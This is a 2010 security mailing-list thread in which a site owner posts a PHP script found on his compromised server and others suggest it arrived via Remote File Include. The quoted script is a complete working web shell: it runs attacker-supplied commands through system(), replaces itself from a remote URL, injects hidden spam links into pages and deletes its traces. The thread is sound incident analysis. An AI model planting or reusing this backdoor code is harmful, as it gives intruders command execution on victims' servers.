Historically, I've seen this stuff done through a Remote File Include, though I can think of a dozen other ways to get it onto your server. I'd probably start by digging through the logs looking for someone including this file in some URL parameter.
On Mon, Mar 1, 2010 at 10:31 AM, Jim Halfpenny <[email protected]> wrote: > A search for the string abcdefghiklmnjsweqrtyuiopzx shows a forum > thread with some info on this file: > > http://www.webhostingtalk.com/showthread.php?t=876121 > > I'm sure there are other sources of info out there. Time for some forensic > analysis of your logs to work out how and when this got here. I'm guessing > an automated attack against a known vuln in a PHP app? > > Jim > > On 1 March 2010 09:16, Adrian Crenshaw <[email protected]> wrote: >> >> Ok, I think one of my sites may have been compromised. I found the >> following PHP script on a site, but I'm not sure what it is trying to do. >> Anyone else ever seen this script before? >> >> Adrian >> >> <?php >> ignore_user_abort(1); >> set_time_limit(0); >> >> function Clear() >> { >> unlink("c"); >> unlink("1r"); >> unlink("log"); >> } >> >> function Clear2() >> { >> $mrd = trim(file_get_contents("m")); >> $pt = "../$mrd"; >> $fin = file_get_contents($pt); >> $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); >> $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); >> $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); >> $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin); >> $fin = ereg_replace("<!--dd4-->", "", $fin); >> $fin = ereg_replace("<!--dd5-->", "", $fin); >> $fin = ereg_replace("<font style=\"position: absolute;overflow: >> hidden;height: 0;width: 0\">", "", $fin); >> $fmrd = fopen($pt, "w+"); >> fwrite($fmrd, $fin); >> fclose($fmrd); >> echo " upt-ok"; >> } >> >> function GetVar($name, &$var) >> { >> $var = ""; >> if (isset($_POST[$name])) >> $var = $_POST[$name]; >> >> if (isset($_GET[$name])) >> $var = $_GET[$name]; >> >> if (($var) =="") >> return false; >> else return true; >> } >> >> function Gen() >> { >> $alp = "abcdefghiklmnjsweqrtyuiopzx"; >> $maps = array(); >> if (isset($_POST["sg"])) >> $sg = $_POST["sg"]; >> >> if (isset($_GET["sg"])) >> $sg = $_GET["sg"]; >> >> if 
(isset($_POST["gm"])) >> $g = $_POST["gm"]; >> >> if (isset($_GET["gm"])) >> $g = $_GET["gm"]; >> >> >> $path = ""; >> $fr = fopen("1r", "a+"); >> if (file_exists("c")) >> { >> $fconf = file("c"); >> $tname = trim($fconf[0]); >> $cname = trim($fconf[1]); >> $curs = trim($fconf[2]); >> $pid = trim($fconf[3]); >> if ($pid == 100) >> { >> $pid = 0; >> $rnd = mt_rand(0, 999); >> $nm = ""; >> for ($i=0; $i<3; $i++) >> { >> $ran = mt_rand(0,26); >> $sym = $alp[$ran]; >> $nm = $nm.$sym; >> } >> $cname = $nm; >> mkdir("$tname/$cname"); >> $curs = $g; >> } >> } >> else >> { >> $rnd = mt_rand(0, 999); >> $nm = ""; >> for ($i=0; $i<5; $i++) >> { >> $ran = mt_rand(0,26); >> $sym = $alp[$ran]; >> $nm = $nm.$sym; >> } >> $tname = $nm; >> $pid = 0; >> $curs = $g; >> mkdir($tname); >> $fht = fopen("$tname/.htaccess", "w+"); >> $htname = $sg."2.txt"; >> $fp = fopen($htname, "r"); >> $fin = ''; >> while (!feof($fp)) >> { >> $fc = fgets($fp, 1024); >> if (!$fc) break; >> $fin .= $fc; >> } >> fclose($fp); >> fwrite($fht, $fin); >> fclose($fht); >> $rnd = mt_rand(0, 999); >> $nm = ""; >> for ($i=0; $i<3; $i++) >> { >> $ran = mt_rand(0,26); >> $sym = $alp[$ran]; >> $nm = $nm.$sym; >> } >> $cname = $nm; >> mkdir("$tname/$cname"); >> } >> $gname = $sg."sgen.php"; >> for ($j=$pid; $j<$pid+10; $j++) >> { >> $fp = fopen($gname."?g=$curs", "r"); >> $fin = ''; >> while (!feof($fp)) >> { >> $fc = fgets($fp, 1024); >> if (!$fc) break; >> $fin .= $fc; >> } >> fclose($fp); >> >> $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+"); >> fwrite($fnd, $fin); >> fclose($fnd); >> } >> >> if ($j==100) >> { >> $fp = fopen($gname."?g=$curs&m=1", "r"); >> $fin = ''; >> while (!feof($fp)) >> { >> $fc = fgets($fp, 1024); >> if (!$fc) break; >> $fin .= $fc; >> } >> fclose($fp); >> $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+"); >> fwrite($fnd, $fin); >> fclose($fnd); >> $map = "$path/$tname/$cname/$curs"."_lm.htm"; >> fwrite($fr,"$map\n"); >> } >> >> $fconf = fopen("c", "w+"); >> fwrite($fconf, 
$tname."\n"); >> fwrite($fconf, $cname."\n"); >> fwrite($fconf, $curs."\n"); >> $nj = $j; >> fwrite($fconf, $nj."\n"); >> fclose($fconf); >> } >> >> function Update() >> { >> $thisname = "1.php"; >> if (isset($_POST['u'])) >> $u = $_POST['u']; >> >> if (isset($_GET['u'])) >> $u = $_GET['u']; >> >> $fp = fopen($u, "r"); >> $fin = ''; >> while (!feof($fp)) >> { >> $fc = fgets($fp, 1024); >> if (!$fc) break; >> $fin .= $fc; >> } >> fclose($fp); >> >> $fthis = fopen($thisname, "w+"); >> fwrite($fthis, $fin); >> fclose($fthis); >> } >> >> function Com() >> { >> if (isset($_POST['c'])) >> @system($_POST['c']); >> if (isset($_GET['c'])) >> @system($_GET['c']); >> } >> >> function UpKos() >> { >> $mrd = trim(file_get_contents("m")); >> $pt = "../$mrd"; >> $fin = file_get_contents($pt); >> $fin = ereg_replace("adsttnmq1", "<adsttnmq1>", $fin); >> $fin = ereg_replace("sdioyslkjs2", "<sdioyslkjs2>", $fin); >> $fmrd = fopen($pt, "w+"); >> fwrite($fmrd, $fin); >> fclose($fmrd); >> } >> >> >> function MRepl() >> { >> $mpt = ""; >> $drs = ""; >> $begtag = "<adsttnmq1><font style=\"position: absolute;overflow: >> hidden;height: 0;width: 0\">"; >> $endtag = "</font></body></html><sdioyslkjs2> "; >> $mrd = trim(file_get_contents("m")); >> $pt = "../$mrd"; >> $fin = file_get_contents($pt); >> GetVar("mpt", $mpt); >> // удаляем завершающие хтмл теги ("remove the closing html tags") >> $fin = preg_replace ("/<\/body>/i", "", $fin); >> $fin = preg_replace ("/<\/html>/i", "", $fin); >> $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); >> $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); >> $fp = fopen($mpt, "r"); >> GetVar("drs", $drs); >> $fin = $fin.$begtag; >> $drs = str_replace("\\", "", $drs); >> $fin = $fin.$drs; >> $fin = $fin.$endtag; >> $fmrd = fopen($pt, "w+"); >> fwrite($fmrd, $fin); >> fclose($fmrd); >> } >> >> function Main() >> { >> if (isset($_POST['u']) || isset($_GET['u'])) >> { >> Update(); >> exit(); >> } >> >> if (isset($_POST['c']) || isset($_GET['c'])) >> { >> Com(); >> 
exit(); >> } >> >> if (isset($_POST['uk']) || isset($_GET['uk'])) >> { >> UpKos(); >> exit(); >> } >> >> if (isset($_POST['g']) || isset($_GET['g'])) >> { >> Gen(); >> exit(); >> } >> >> if (isset($_POST['s']) || isset($_GET['s'])) >> { >> MRepl(); >> exit(); >> } >> >> if (isset($_POST['cl']) || isset($_GET['cl'])) >> { >> Clear(); >> exit(); >> } >> >> if (isset($_POST['cl2']) || isset($_GET['cl2'])) >> { >> Clear2(); >> exit(); >> } >> >> echo "<ok>"; >> >> } >> >> Main(); >> >> ?> >> >> _______________________________________________ >> Pauldotcom mailing list >> [email protected] >> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >> Main Web Site: http://pauldotcom.com > > > _______________________________________________ > Pauldotcom mailing list > [email protected] > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > Main Web Site: http://pauldotcom.com > -- Andrew Ellis http://blog.psych0tik.net _______________________________________________ Pauldotcom mailing list [email protected] http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
